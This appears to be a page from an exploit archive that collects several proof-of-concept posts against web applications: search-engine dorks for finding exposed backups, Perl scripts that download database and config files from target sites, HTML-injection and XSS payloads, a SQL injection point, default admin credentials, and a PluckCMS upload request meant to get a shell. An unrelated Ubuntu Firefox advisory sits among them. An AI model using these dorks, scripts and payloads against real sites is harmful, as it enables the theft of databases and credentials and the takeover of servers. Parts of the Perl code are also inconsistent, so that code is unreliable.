WordPress BackUpWordPress version 3.8 appears to leave backups in a world accessible directory under the document root.

    ====================================================================================================================================| # Title     : WordPress BackUpWordPress 3.8 Plugins Backup Disclosure Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://wordpress.org/plugins/backupwordpress/                                                                     |  | # Dork      : "/wp-content/backupwordpress- "                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use Dork : "/wp-content/backupwordpress- "[+] The search result gives you some websites that took earlier a Wordpress backup.[+] http://127.0.0.1/WordPress3/wp-content/backupwordpress-89c0bd0079-backups/====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

WordPress BackUpWordPress 3.8 Backup Disclosure

Zstore version 6.5.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Zstore version 6.5.4 Database Disclosure Exploit                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://github.com/leon-mbs/zstore/releases/tag/6.5.4                                                              |    
| # Dork      : "Zippy склад"                                                                                                      |  
====================================================================================================================================

poc :

[-] Download database backup :

    This file may disclose sensitive information. This information can be used to launch further attacks.

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
# Author : indoushka

use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] Zstore version 6.5.4  Database Disclosure [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[+] Author : indoushka \n\n";  
print "[-] How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/db.sql \n";  
print "[+] usage2 : perl $0 localhost /db.sql \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="config/config.ini";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/db.sql");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/.env\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Zstore 6.5.4 Database Disclosure

Ad Manager Pro version 3.05 suffers from a backup disclosure vulnerability.

    ====================================================================================================================================| # Title     : Ad Manager Pro 3.05 Backup Disclosure Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : http://www.P30vel.ir                                                                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================P0C :[+] appears to leave backups in a world accessible directory under the document root & The plugin exports a backup exported as a text file and contains sensitive informations.[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /admanager/data/[+] https://127.0.0.1/localhost/admanager/data/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

Ad Manager Pro 3.05 Backup Disclosure

Active Matrimonial CMS version 1.4 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Active Matrimonial CMS v 1.4 HTML inject Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://activeitzone.com/                                                                                          |  | # Dork      : "Copyright © 2019 Active Matrimonial CMS - All Rights Reserved "                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register new member .[+] Go to edit your profil http://127.0.0.1/xywarscom/home/profile[+] in Introduction box , put your code or use this code for test :<marquee><font color=lime size=32>Hacked by indoushka</font></marquee></tr><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a></tr>====Greetings to :===================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |=====================================================================================================================================

Active Matrimonial CMS 1.4 HTML Injection

Acon Architecture and Construction Website CMS version 1.2 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Acon - Architecture and Construction Website CMS v1.2 Insecure Settings Vulnerability                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.mother-of-mangrove.com/xicia/cc/acon/                                                                  |  | # Dork      : Acon - Building and Architecture Website CMS                                                                       |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+]  Dorking In Google Or Other Search Enggine .[+]  use login : Username: admin@gmail.com & Password: 1234 [+]  http://127.0.0.1/www/demoslycom/xicia/cc/acon/admin/  ====Greetings to :===================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |=====================================================================================================================================

Acon Architecture and Construction Website CMS 1.2 Insecure Settings

ACJWEB DESIGNER version 1.0 suffers from a remote SQL injection vulnerability.

    ======================================================================================|| # Title     : ACJWEB DESIGNER 1.0 - SQL Injection Vulnerability                     || # Author    : indoushka                                                             |                                            | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |                                          | # Vendor    : aluizio81@gmail.com                                                   || # Drok      : inurl:sobre.php?id=                                                   |======================================================================================|poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : http://127.0.0.1/asmac.combr/sobre.php?id= <======inject here[+] login = login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        =======================================================================================================================================

ACJWEB DESIGNER 1.0 SQL Injection

Ubuntu Security Notice 6143-3 - USN-6143-1 fixed vulnerabilities and USN-6143-2 fixed minor regressions in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Jun Kokatsu discovered that Firefox did not properly validate site-isolated process for a document loaded from a data: URL that was the result of a redirect, leading to an open redirect attack. An attacker could possibly use this issue to perform phishing attacks.

    ==========================================================================Ubuntu Security Notice USN-6143-3June 21, 2023firefox regressions==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:USN-6143-2 caused some minor regressions in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:USN-6143-1 fixed vulnerabilities and USN-6143-2 fixed minor regressions inFirefox. The update introduced several minor regressions. This update fixesthe problem.We apologize for the inconvenience.Original advisory details: Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. (CVE-2023-34414, CVE-2023-34416, CVE-2023-34417)  Jun Kokatsu discovered that Firefox did not properly validate site-isolated process for a document loaded from a data: URL that was the result of a redirect, leading to an open redirect attack. An attacker could possibly use this issue to perform phishing attacks. (CVE-2023-34415)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         114.0.2+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6143-3  https://ubuntu.com/security/notices/USN-6143-1  https://launchpad.net/bugs/2024513Package Information:  https://launchpad.net/ubuntu/+source/firefox/114.0.2+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6143-3

A Cart version 2.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : A cart 2.0 Database Disclosure Exploit                                                                             |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://ToastForums.com                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# A_cart 2.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
system('A_cart 2.0 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="acart2_0.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart2_0.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart2_0.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :==============================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |   
============================================================================================

A Cart 2.0 Database Disclosure

3CX Open Standards Software IP PBX Thailand version 2.0.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : 3CX Open Standards Software IP PBX Thailand v 2.0.3 XSS Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://3cx.com                                                                                                    |  | # Dork      : intext:''3CX: Open Standards Software IP PBX''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventdetail.php?type_id=43&events_id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://127.0.0.1/3cx/eventdetail.php?type_id=43&events_id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

3CX Open Standards Software IP PBX Thailand 2.0.3 Cross Site Scripting

File Upload vulnerability in PluckCMS v.4.7.10 dev versions allows a remote attacker to execute arbitrary code via a crafted image file to the the save_file() parameter.

admin.php:

language.php：

save\_file():

"../../../images/wphp.jpg" Be written to \\data\\settings\\langpref.php

Users can upload a picture file containing malicious code to getshell.

POST /pluck-4.7.10-dev1/admin.php?action=language HTTP/1.1  
Host: 127.0.0.1:83  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:83/pluck-4.7.10-dev1/admin.php?action=language  
Cookie: LQUKaS\_admin\_username=admin; Hm\_lvt\_f6f37dc3416ca514857b78d0b158037e=1570503836; PHPSESSID=a0bhen6shpeifgc20p0l23pmj1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 70

cont1=../../../images/php.jpg&save=%E5%82%A8%E5%AD%98&cmd=echo "2333";

Tag

#firefox